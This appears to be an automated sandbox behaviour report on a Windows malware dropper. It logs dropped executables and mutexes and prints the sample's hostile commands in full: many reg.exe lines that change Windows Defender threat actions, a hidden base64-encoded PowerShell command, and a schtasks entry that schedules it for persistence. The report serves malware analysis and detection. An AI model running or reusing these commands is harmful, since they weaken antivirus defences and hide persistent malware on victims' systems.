Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7zS7660.tmpJump to behavior
Source: classification engineClassification label: mal88.evad.winEXE@98/15@0/0
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeMutant created: \BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2108:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3112:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2160:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: file.exeStatic file information: File size 7607851 > 1048576

Data Obfuscation

barindex
Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411360 push ecx; mov dword ptr [esp], ecx0_2_00411361
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413954 push eax; ret 0_2_00413972
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413CC0 push eax; ret 0_2_00413CEE
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeCode function: 2_2_10149450 push eax; ret 2_2_1014946E
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeCode function: 2_2_101352D5 push ecx; ret 2_2_101352E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF8163B2569 push eax; retf 17_2_00007FF8163B2609
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeCode function: 23_2_10149450 push eax; ret 23_2_1014946E
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeCode function: 23_2_101352D5 push ecx; ret 23_2_101352E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_06760260 push es; ret 24_2_06760270
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_0676B2FD push ecx; ret 24_2_0676B308
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_06760161 pushfd ; iretd 24_2_0676016D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_06762900 push es; ret 24_2_06762910
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_0676690B push es; ret 24_2_06766910
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_06F180AC push es; ret 24_2_06F180B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_06F1FF20 push es; ret 24_2_06F1FF30
Source: file.exeStatic PE information: section name: .sxdata
Source: Install.exe.0.drStatic PE information: section name: .sxdata
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00418320

Persistence and Installation Behavior

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeFile created: C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeFile created: C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exeJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Windows\Tasks\bbrwVHWbINAVAbZleQ.jobJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
